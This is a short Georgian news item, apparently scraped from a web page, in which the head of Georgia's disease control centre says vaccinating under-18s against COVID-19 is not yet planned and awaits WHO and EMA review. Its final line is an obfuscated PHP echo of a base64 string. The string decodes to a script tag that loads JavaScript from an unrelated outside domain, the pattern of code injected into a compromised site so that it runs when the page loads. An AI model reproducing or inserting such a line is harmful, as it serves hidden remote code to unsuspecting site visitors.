celsiusi
ავერსი შნაიდერი
დაავადებათა კონტროლის ეროვნული ცენტრის დირექტორის ამირან გამყრელიძის განცხადებით, საქართველოში 18 წლამდე მოსახლეობის აცრა ჯერჯერობით არ იგეგმება.
 
როგორც გამყრელიძემ მედია-ვებინარზე განაცხადა, საქართველო ამ საკითხის ჯანმრთელობის მსოფლიო ორგანიზაციის და ევროპის წამლის სააგენტოს მიერ განხილვას დაელოდება.
 
„ეს საკითხი დაუშვა კანადამ. ჯერ მხოლოდ „ფაიზერზეა“ კვლევები 12-დან 18 წლამდ ასაკის მოსახლეობაში. „ასტრაზენეკაც“ ატარებს ამ კვლევებს. ალბათ შემოდგომამდე მაინც, სანამ ამას ჯანმრთელობის მსოფლიო ორგანიზაცია და ევროპის წამლის სააგენტო არ განიხილავს, ამაზე ჩვენთან საუბარი არ არის. თუმცა ეს საკითხი მნიშვნელოვანია იმიტომ, რომ ბავშვების აცრის გარეშე პანდემიას მსოფლიო ვერ დაამარცხებს. ისინი არიან ინფექციის ძლიერი გამავრცელებლები, ამიტომ, მოგვიწევს ამ საკითხზე მუშაობა, მაგრამ ეს იქნება მოგვიანებით“,- განაცხადა გამყრელიძემ.
1043
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");